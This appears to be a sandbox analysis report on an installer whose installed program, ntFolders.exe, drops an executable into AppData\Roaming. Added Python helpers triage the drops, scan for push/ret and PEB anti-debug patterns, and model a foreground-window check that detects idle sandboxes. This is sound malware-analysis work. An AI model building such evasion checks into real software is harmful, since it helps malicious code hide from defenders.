Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00412B40 push 00412BA3h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00450FF8 push 0045102Bh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004055BD push eax; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040568D push 00405899h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040570E push 00405899h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004057F0 push 00405899h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040578B push 00405899h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004311AD push esi; ret |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F4BB push ecx; ret |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) |
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_shfoldr.dll |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\is-NNEQH.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\is-6TIMV.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_setup64.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_iscrypt.dll |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004243AC IsIconic,SetActiveWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004177B0 IsIconic,GetCapture, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00417EE6 IsIconic,SetWindowPos, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-6TIMV.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-NNEQH.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_shfoldr.dll |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_setup64.tmp |
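Read together, the "File created" rows above and the "Dropped PE file which has not been started" rows tell the drop story. file.exe is an Inno Setup stub (the is-XXXXX.tmp staging directories, the _isetup\ helpers, _iscrypt.dll and unins000.exe are all Inno Setup artifacts): it unpacks the real installer is-188R9.tmp, which installs ntFolders.exe and its language DLL. ntFolders.exe, the installed "product", then writes LUxJPTIXtIs.exe into a GUID-named folder directly under AppData\Roaming, a user-writable location the installer itself never touched. The Python below is an added triage helper, not part of the sandbox report or of the sample: it parses rows in this format, attributes each dropped file to its source process, flags drops into AppData\Roaming\{GUID}\ by anything other than the installer's own is-*.tmp staging processes, and lists dropped files that are absent from the not-started list. The sample rows are copied from this report (one unrelated row is included to show it being skipped); the regular expressions and the classification rules are my own assumptions, not the sandbox's logic.

```python
"""Added example: cross-reference 'File created' and 'Dropped PE file which has not
been started' rows from a sandbox report in this format. The rows below are copied
from the report; the regexes and classification rules are the example's own."""
import re
from collections import defaultdict

ROW = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|\s*"
    r"(?P<kind>File created|Dropped PE file which has not been started):\s*"
    r"(?P<path>.+?)\s*(?:\(copy\))?\s*(?:\|.*)?$"   # drop '(copy)' and any trailing link text
)
# Inno Setup stages its installer and helper DLLs under is-XXXXX.tmp directories
INNO_STAGING = re.compile(r"\\is-[A-Z0-9]{5}\.tmp(\\|$)", re.I)
# A GUID-named folder directly under AppData\Roaming is a classic user-writable persistence spot
ROAMING_GUID = re.compile(
    r"\\AppData\\Roaming\\\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}\\", re.I)


def parse(rows):
    """Return ({source process: [dropped paths]}, {paths reported as never started})."""
    created, not_started = defaultdict(list), set()
    for row in rows:
        m = ROW.match(row.strip())
        if not m:
            continue                      # any other row type is ignored
        if m["kind"] == "File created":
            created[m["src"]].append(m["path"])
        else:
            not_started.add(m["path"])
    return created, not_started


def persistence_drops(created):
    """Files written into AppData\\Roaming\\{GUID}\\ by anything other than the installer's
    own staging processes. The installer copying its payload is expected; the installed
    program writing a fresh executable there is what deserves a second look."""
    out = []
    for src, paths in created.items():
        if INNO_STAGING.search(src):
            continue
        out.extend(p for p in paths if ROAMING_GUID.search(p))
    return out


def possibly_executed(created, not_started):
    """Dropped files the sandbox did not list as never started. Absence from that list is
    not proof of execution (the signature only covers files the sandbox recognised as PE);
    confirm each candidate against the process tree."""
    dropped = {p for paths in created.values() for p in paths}
    return sorted(dropped - not_started)


# Rows copied from the report (source process | event | path), plus one unrelated row.
SAMPLE_ROWS = [
    r"Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)",
    r"Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp",
    r"Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_iscrypt.dll",
    r"Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)",
    r"Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\ntFolders.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)",
    r"Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)",
    r"Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX",
]


def triage(rows=SAMPLE_ROWS):
    created, not_started = parse(rows)
    return {
        "drops_by_source": dict(created),
        "persistence_drops": persistence_drops(created),
        "possibly_executed": possibly_executed(created, not_started),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value, sep=": ")
```

The interesting answer is the persistence_drops list: one file, written by the installed program rather than by the installer. The possibly_executed list still contains the installer's own intermediate files, which is why it is a candidate list to check against the process tree and not a finding on its own.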
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00451554 FindFirstFileA,GetLastError, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0048A778 FindFirstFileA,6D2D69D0,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00423E2D FindFirstFileExW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_1000959D FindFirstFileExW, |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\ |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F789 SetUnhandledExceptionFilter, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
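Two groups of rows above are byte-level indicators rather than API calls. The `push 00405899h; ret` rows (1_2_0040568D and neighbours) and the `push esi; ret` / `push ecx; ret` rows in ntFolders.exe write a jump as a push/return pair: `push imm32; ret` transfers control to imm32 without a jmp opcode or a relative offset, and `push reg; ret` is an indirect jump whose target exists only at run time. The `mov eax, dword ptr fs:[00000030h]` rows (2_2_0044028F through 2_2_10006CE1) read the PEB pointer from the TEB, the first step of a BeingDebugged check, which is why the sandbox groups them with the IsDebuggerPresent rows. The Python below is an added scanner, not code from the sandbox or from the sample, that recovers both patterns and the push/ret jump target from a raw code buffer. The sample bytes are constructed to reproduce the listed instructions; the image base 00400000h is an assumption for the example (the 2_2_10xxxxxx hits come from a DLL mapped at 10000000h, so pass that base when scanning it). Two caveats a practitioner would want: byte matching without a disassembler can fire on bytes that belong to other instructions or to data, and both patterns also occur in ordinary compiler and runtime code (Delphi-compiled binaries such as this Inno Setup installer routinely contain push/ret pairs, and the IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter chains at 2_2_0040F5F5 and 2_2_10003AD4 are standard MSVC runtime boilerplate), so a hit is a lead to confirm in a disassembler, not a verdict.

```python
"""Added example: scan raw x86 code for the push/ret and fs:[30h] patterns listed
in this report. Byte-pattern matching without a disassembler can hit inside other
instructions or data, so confirm every hit in a disassembler."""
import struct
from dataclasses import dataclass

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_DISP = b"\x30\x00\x00\x00"   # fs:[30h] holds the PEB pointer in the x86 TEB


@dataclass(frozen=True)
class Hit:
    va: int        # virtual address of the first byte of the pattern
    pattern: str   # "push_imm_ret", "push_reg_ret" or "peb_read"
    detail: str    # decoded instruction text


def scan(code: bytes, base_va: int):
    """Return the hits found in `code`, which is assumed to be mapped at base_va."""
    hits, i, n = [], 0, len(code)
    while i < n:
        b = code[i]
        # 68 imm32 C3  ->  push imm32; ret  ==  jmp imm32 (no jmp opcode, no relative offset)
        if b == 0x68 and i + 5 < n and code[i + 5] == 0xC3:
            target = struct.unpack_from("<I", code, i + 1)[0]
            hits.append(Hit(base_va + i, "push_imm_ret",
                            f"push {target:08X}h; ret  (jumps to {target:08X}h)"))
            i += 6
            continue
        # 50+r C3  ->  push r32; ret  ==  jmp r32 (target only known at run time)
        if 0x50 <= b <= 0x57 and i + 1 < n and code[i + 1] == 0xC3:
            hits.append(Hit(base_va + i, "push_reg_ret", f"push {REG32[b - 0x50]}; ret"))
            i += 2
            continue
        # 64 A1 30 00 00 00  ->  mov eax, dword ptr fs:[30h]  (short encoding, eax only)
        if b == 0x64 and i + 5 < n and code[i + 1] == 0xA1 and code[i + 2:i + 6] == PEB_DISP:
            hits.append(Hit(base_va + i, "peb_read", "mov eax, dword ptr fs:[30h]"))
            i += 6
            continue
        # 64 8B /r disp32 with mod=00, rm=101  ->  mov r32, dword ptr fs:[30h]
        if (b == 0x64 and i + 6 < n and code[i + 1] == 0x8B
                and (code[i + 2] & 0xC7) == 0x05 and code[i + 3:i + 7] == PEB_DISP):
            reg = REG32[(code[i + 2] >> 3) & 7]
            hits.append(Hit(base_va + i, "peb_read", f"mov {reg}, dword ptr fs:[30h]"))
            i += 7
            continue
        i += 1
    return hits


# Constructed sample bytes reproducing the instructions flagged in the report;
# the image base 00400000h is an assumption made for this example.
SAMPLE_CODE = bytes.fromhex(
    "6899584000C3"      # push 00405899h; ret          (cf. 1_2_0040568D)
    "56C3"              # push esi; ret                (cf. 2_2_004311AD)
    "64A130000000"      # mov eax, fs:[30h]            (cf. 2_2_0044028F)
    "648B0D30000000"    # mov ecx, fs:[30h]            (long encoding, any register)
    "0FB64002"          # movzx eax, byte ptr [eax+2]  -> PEB.BeingDebugged, the usual next step
)
SAMPLE_BASE = 0x400000


def scan_sample():
    return scan(SAMPLE_CODE, SAMPLE_BASE)


if __name__ == "__main__":
    for h in scan_sample():
        print(f"{h.va:08X}  {h.pattern:<13} {h.detail}")
```

For a real unpacked image (for example the 2.2.ntFolders.exe.400000.0.unpack dump the Yara rows refer to) feed `scan` the bytes of the .text section and its mapped base, then diff the push_imm_ret targets against the function starts the sandbox listed: a push/ret whose target is a real function entry is compiler output, one whose target lands mid-function or in a writable section is worth a closer look.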
Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: Program Manager |
Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: program manager |
Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: F.program manager |
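The GetForegroundWindow, GetWindowTextA, Sleep, Sleep, GetForegroundWindow, GetWindowTextA chain in ntFolders.exe and the "Program Manager" / "program manager" strings in its memory fit a common sandbox check: "Program Manager" is the window title of Progman, the Windows desktop, so a foreground window that is still the bare desktop after a pause, and that has not changed between two samples, looks like an analysis machine nobody is using. The lowercase copy of the string suggests a case-insensitive comparison. The exact decision logic is not visible in the report, so the Python below is an added model of that check, not the sample's code: a pure function that decides from a series of sampled titles (constructed in the usage) and a Windows-only sampler that reproduces the call chain with ctypes. What the check does not tell you is also worth noting: the GetUserNameA calls in the same function are not explained by the report, and I make no assumption about what the username is compared with.

```python
"""Added example: model of the foreground-window sandbox check suggested by the
GetForegroundWindow/GetWindowTextA/Sleep chain and the 'Program Manager' strings."""
import sys
import time

DESKTOP_TITLE = "program manager"   # title of Progman, the Windows desktop window


def looks_unattended(titles, min_samples=2):
    """titles: foreground-window titles sampled over time, oldest first.

    Returns True when the environment shows no sign of a user: the foreground window
    never changed across the samples and it is the bare desktop (or no window at all,
    which GetWindowText reports as an empty string). A title that changes between
    samples, or that belongs to an application window, counts as attended."""
    titles = [t.strip().lower() for t in titles]
    if len(titles) < min_samples:
        return False                       # one sample cannot show "nothing happened"
    if len(set(titles)) != 1:
        return False                       # the foreground window changed: someone is active
    return titles[0] in ("", DESKTOP_TITLE)


def sample_foreground_titles(count=3, delay_s=1.0):
    """Windows only: the live equivalent of the call chain in the report
    (GetForegroundWindow, GetWindowText, Sleep, repeat). Raises elsewhere."""
    if sys.platform != "win32":
        raise RuntimeError("requires user32.dll")
    import ctypes
    user32 = ctypes.windll.user32
    titles = []
    for _ in range(count):
        hwnd = user32.GetForegroundWindow()
        buf = ctypes.create_unicode_buffer(256)
        user32.GetWindowTextW(hwnd, buf, 256)   # empty string if hwnd is 0 or has no title
        titles.append(buf.value)
        time.sleep(delay_s)
    return titles


# Constructed sample series: what an idle sandbox and a used desktop look like.
IDLE_SANDBOX = ["Program Manager", "Program Manager", "program manager"]
BUSY_DESKTOP = ["Program Manager", "report.docx - Word", "report.docx - Word"]


if __name__ == "__main__":
    print("idle sandbox:", looks_unattended(IDLE_SANDBOX))
    print("busy desktop:", looks_unattended(BUSY_DESKTOP))
    if sys.platform == "win32":
        print("this machine:", looks_unattended(sample_foreground_titles()))
```

The practical consequence for anyone running this sample in a sandbox is the inverse of the check: give the guest a foreground window that is not Progman and that changes during the run (open an application, move focus between windows), otherwise the branch after the comparison is the one you will be analysing rather than the payload.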
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA, |
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: GetLocaleInfoA, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: GetLocaleInfoA, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
Source: Yara match | File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.3330000.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.3330000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000002.330488356.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.329404364.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.330580256.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |